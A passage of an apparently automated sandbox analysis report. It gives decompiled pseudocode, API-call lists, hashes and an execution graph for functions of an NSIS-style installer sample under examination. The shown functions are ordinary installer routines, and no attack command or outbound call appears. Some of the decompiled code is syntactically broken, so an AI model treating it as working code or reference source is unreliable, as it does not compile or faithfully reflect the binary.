                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction ID: fb252943c263502b915e172e451356f37a414cf8932e3a565ad31ae7147df210
                                                            • Opcode Fuzzy Hash: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction Fuzzy Hash: E2217371948208BEEB059FB5DA86AAD7FB4EF45304F10447EF101B61D1D7B989819B18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402EA8 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402EA8(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x432048 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x45242c) {
							_t3 = CreateDialogParamA( *0x452420, 0x6f, 0, E00402E25, 0);
							 *0x432048 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040669F(0);
					}
				} else {
					_t6 =  *0x432048;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x432048 = 0;
					return _t6;
				}
			}






                                                            0x00402eaf
                                                            0x00402ecf
                                                            0x00402ed9
                                                            0x00402ee5
                                                            0x00402ef6
                                                            0x00402eff
                                                            0x00000000
                                                            0x00402f04
                                                            0x00402f0b
                                                            0x00402ed1
                                                            0x00402ed8
                                                            0x00402ed8
                                                            0x00402eb1
                                                            0x00402eb1
                                                            0x00402eb8
                                                            0x00402ebb
                                                            0x00402ebb
                                                            0x00402ec1
                                                            0x00402ec8
                                                            0x00402ec8

                                                            APIs
                                                            • DestroyWindow.USER32 ref: 00402EBB
                                                            • GetTickCount.KERNEL32(00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402ED9
                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F04
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction ID: f2601d1978d4935414455477ceead43ade8f8f36080c659767c01e9f51b987ab
                                                            • Opcode Fuzzy Hash: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction Fuzzy Hash: 12F05E31441A20ABC6216B60FF8C99B7B74A705B12B21583AF105B11F6C6B84889CBEC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C21E71 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E73C21E71(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				CHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x73c240c4 : 0x73c240bc;
					lstrcpyA(_t21,  ==  ? 0x73c240c4 : 0x73c240bc);
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
					}
					_t21 = _a8;
					wsprintfA(_t21, "callback%d", _t19);
				}
				return _t21;
			}






                                                            0x73c21e71
                                                            0x73c21e7c
                                                            0x73c21eaf
                                                            0x73c21ebf
                                                            0x73c21ec4
                                                            0x73c21e7e
                                                            0x73c21e88
                                                            0x73c21e8e
                                                            0x73c21e96
                                                            0x73c21e96
                                                            0x73c21e99
                                                            0x73c21ea4
                                                            0x73c21eaa
                                                            0x73c21ecd

                                                            APIs
                                                            • wsprintfA.USER32 ref: 73C21EA4
                                                            • lstrcpyA.KERNEL32(?,error,00000818,73C216E5,00000000,?), ref: 73C21EC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcpywsprintf
                                                            • String ID: callback%d$error
                                                            • API String ID: 2408954437-1307476583
                                                            • Opcode ID: 44ccfd4956e661cda1382f2e699591bee88271269be0fab78eba5215238b1474
                                                            • Instruction ID: 92e5d6dc0f7f20e5c50c3688c56bbee2571a5c8592e9806ecfba2d5649736dfb
                                                            • Opcode Fuzzy Hash: 44ccfd4956e661cda1382f2e699591bee88271269be0fab78eba5215238b1474
                                                            • Instruction Fuzzy Hash: DBF0D4312041209FC705DB49DC58FAA77EAFF85312F1985A8F94ADB251C770AC818B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405CD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E00405CD7(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406257(0x446098, _a4);
				_t21 = E00405C82(0x446098);
				if(_t21 != 0) {
					E00406535(_t21);
					if(( *0x452438 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x446098;
						while(1) {
							_t11 = lstrlenA(0x446098);
							_push(0x446098);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E004065CE();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C30(0x446098);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BE9();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                            0x00405ce3
                                                            0x00405cee
                                                            0x00405cf2
                                                            0x00405cf9
                                                            0x00405d05
                                                            0x00405d11
                                                            0x00405d11
                                                            0x00405d29
                                                            0x00405d2a
                                                            0x00405d31
                                                            0x00405d32
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d15
                                                            0x00405d1c
                                                            0x00405d24
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d1c
                                                            0x00405d34
                                                            0x00000000
                                                            0x00405d48
                                                            0x00405d07
                                                            0x00405d0b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d0b
                                                            0x00405cf4
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • lstrlenA.KERNEL32(00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000,0047B000), ref: 00405D2A
                                                            • GetFileAttributesA.KERNEL32(00446098,00446098,00446098,00446098,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 00405D3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: T'Wu
                                                            • API String ID: 3248276644-2377931180
                                                            • Opcode ID: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction ID: ca67251d285f136759c69e236b036a1895e73ffa9f1d75b438997b26ec9dd8f6
                                                            • Opcode Fuzzy Hash: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction Fuzzy Hash: 12F02825108F6526E72632391D09AAF0A45CE93324719453FFCA2B62C2DA3C89429E6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004052EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 89%
                                                            			E004052EC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x43c07c != _t16) {
							_push(_t16);
							_push(6);
							 *0x43c07c = _t16;
							E00404CA7();
						}
						L11:
						return CallWindowProcA( *0x43c084, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C27(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404320(0x413);
				return 0;
			}





                                                            0x004052f0
                                                            0x004052fa
                                                            0x00405316
                                                            0x00405338
                                                            0x0040533b
                                                            0x00405341
                                                            0x0040534b
                                                            0x0040534c
                                                            0x0040534e
                                                            0x00405354
                                                            0x00405354
                                                            0x0040535e
                                                            0x00000000
                                                            0x0040536c
                                                            0x00405323
                                                            0x0040535b
                                                            0x0040535b
                                                            0x00000000
                                                            0x0040535b
                                                            0x0040532f
                                                            0x00405331
                                                            0x00000000
                                                            0x00405331
                                                            0x00405300
                                                            0x00000000
                                                            0x00000000
                                                            0x00405307
                                                            0x00000000

                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0040531B
                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 0040536C
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction ID: 1a66df526f819bcac04dd73860a054bf484f2535563b1484c434c9e94afb1d49
                                                            • Opcode Fuzzy Hash: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction Fuzzy Hash: 34017C72104608EBEF206F61ED91AAB372AEB84395F145037FE05751D0C7BA8D929F29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040613E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E0040613E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x2000;
				_t21 = E004060DD(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x1fff] = _t30[0x1fff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                            0x0040614c
                                                            0x0040614e
                                                            0x00406166
                                                            0x0040616b
                                                            0x00406170
                                                            0x004061ad
                                                            0x004061ad
                                                            0x00406172
                                                            0x00406184
                                                            0x0040618f
                                                            0x00406195
                                                            0x0040619f
                                                            0x00000000
                                                            0x00000000
                                                            0x0040619f
                                                            0x004061b2

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: Call
                                                            • API String ID: 3356406503-1824292864
                                                            • Opcode ID: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction ID: 5cbf1d77a42ccbfbde14d2bcc727d6f9e9f9e3285794b8b30d10470a11d9e604
                                                            • Opcode Fuzzy Hash: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction Fuzzy Hash: 7501BC32500209ABDF22CF60CC09FDB3FA8EF44360F01803AF916A6192D378C964CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D4F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405D4F(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                            0x00405d5f
                                                            0x00405d61
                                                            0x00405d64
                                                            0x00405d90
                                                            0x00405d69
                                                            0x00405d72
                                                            0x00405d77
                                                            0x00405d82
                                                            0x00405d85
                                                            0x00405da1
                                                            0x00405d87
                                                            0x00405d8e
                                                            0x00000000
                                                            0x00405d8e
                                                            0x00405d9a
                                                            0x00405d9e
                                                            0x00405d9e
                                                            0x00405d98
                                                            0x00000000

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D77
                                                            • CharNextA.USER32(00000000), ref: 00405D88
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                            • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:19%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:1578
                                                            Total number of Limit Nodes:49
                                                            execution_graph 3866 73c319c7 3867 73c319d7 VirtualProtect 3866->3867 3868 73c31a1e 3866->3868 3867->3868 3927 401ec5 3935 402c17 3927->3935 3929 401ecb 3930 402c17 17 API calls 3929->3930 3931 401ed7 3930->3931 3932 401ee3 ShowWindow 3931->3932 3933 401eee EnableWindow 3931->3933 3934 402ac5 3932->3934 3933->3934 3936 4062ea 17 API calls 3935->3936 3937 402c2c 3936->3937 3937->3929 4764 73c310c6 4770 73c310f7 4764->4770 4765 73c312a7 GlobalFree 4766 73c311d5 GlobalAlloc 4766->4770 4767 73c31245 GlobalFree 4767->4770 4769 73c312a3 4769->4765 4770->4765 4770->4766 4770->4767 4770->4769 4771 73c31286 GlobalFree 4770->4771 4775 73c3115d GlobalAlloc 4770->4775 4777 73c315c7 4770->4777 4781 73c314e2 4770->4781 4786 73c3157e 4770->4786 4771->4770 4775->4770 4778 73c311ad GlobalFree 4777->4778 4779 73c315ce 4777->4779 4778->4770 4779->4778 4780 73c315d7 lstrcpyA 4779->4780 4780->4778 4782 73c312c6 GlobalAlloc 4781->4782 4783 73c314ef 4781->4783 4782->4770 4784 73c312af 2 API calls 4783->4784 4785 73c31502 4784->4785 4785->4770 4787 73c311ca GlobalFree 4786->4787 4788 73c31587 GlobalAlloc lstrcpynA 4786->4788 4787->4770 4788->4787 3970 401746 3971 402c39 17 API calls 3970->3971 3972 40174d 3971->3972 3976 405e19 3972->3976 3974 401754 3975 405e19 2 API calls 3974->3975 3975->3974 3977 405e24 GetTickCount GetTempFileNameA 3976->3977 3978 405e51 3977->3978 3979 405e55 3977->3979 3978->3977 3978->3979 3979->3974 4789 401947 4790 402c39 17 API calls 4789->4790 4791 40194e lstrlenA 4790->4791 4792 402628 4791->4792 4796 401fcb 4797 402c39 17 API calls 4796->4797 4798 401fd2 4797->4798 4799 4065ce 2 API calls 4798->4799 4800 401fd8 4799->4800 4802 401fea 4800->4802 4803 4061b5 wsprintfA 4800->4803 4803->4802 4516 4014d6 4517 402c17 17 API calls 4516->4517 4518 4014dc Sleep 4517->4518 4520 402ac5 4518->4520 4591 401759 4592 402c39 17 API calls 4591->4592 4593 401760 4592->4593 4594 401786 4593->4594 4595 40177e 4593->4595 4632 406257 lstrcpynA 4594->4632 4631 406257 lstrcpynA 4595->4631 4598 401791 4600 405be9 3 API calls 4598->4600 4599 401784 4602 406535 5 API calls 4599->4602 4601 401797 lstrcatA 4600->4601 4601->4599 4609 4017a3 4602->4609 4603 4065ce 2 API calls 4603->4609 4604 4017e4 4606 405dc5 2 API calls 4604->4606 4606->4609 4607 4017ba CompareFileTime 4607->4609 4608 40187e 4610 405378 24 API calls 4608->4610 4609->4603 4609->4604 4609->4607 4609->4608 4612 406257 lstrcpynA 4609->4612 4618 4062ea 17 API calls 4609->4618 4627 40596d MessageBoxIndirectA 4609->4627 4629 401855 4609->4629 4630 405dea GetFileAttributesA CreateFileA 4609->4630 4613 401888 4610->4613 4611 405378 24 API calls 4617 40186a 4611->4617 4612->4609 4614 403143 31 API calls 4613->4614 4615 40189b 4614->4615 4616 4018af SetFileTime 4615->4616 4619 4018c1 CloseHandle 4615->4619 4616->4619 4618->4609 4619->4617 4620 4018d2 4619->4620 4621 4018d7 4620->4621 4622 4018ea 4620->4622 4623 4062ea 17 API calls 4621->4623 4624 4062ea 17 API calls 4622->4624 4625 4018df lstrcatA 4623->4625 4626 4018f2 4624->4626 4625->4626 4626->4617 4628 40596d MessageBoxIndirectA 4626->4628 4627->4609 4628->4617 4629->4611 4629->4617 4630->4609 4631->4599 4632->4598 4804 401659 4805 402c39 17 API calls 4804->4805 4806 40165f 4805->4806 4807 4065ce 2 API calls 4806->4807 4808 401665 4807->4808 4809 404cd9 GetDlgItem GetDlgItem 4810 404d2f 7 API calls 4809->4810 4820 404f56 4809->4820 4811 404dd7 DeleteObject 4810->4811 4812 404dcb SendMessageA 4810->4812 4813 404de2 4811->4813 4812->4811 4814 404e19 4813->4814 4815 4062ea 17 API calls 4813->4815 4816 4042d4 18 API calls 4814->4816 4821 404dfb SendMessageA SendMessageA 4815->4821 4822 404e2d 4816->4822 4817 4050e4 4818 4050f6 4817->4818 4819 4050ee SendMessageA 4817->4819 4830 405108 ImageList_Destroy 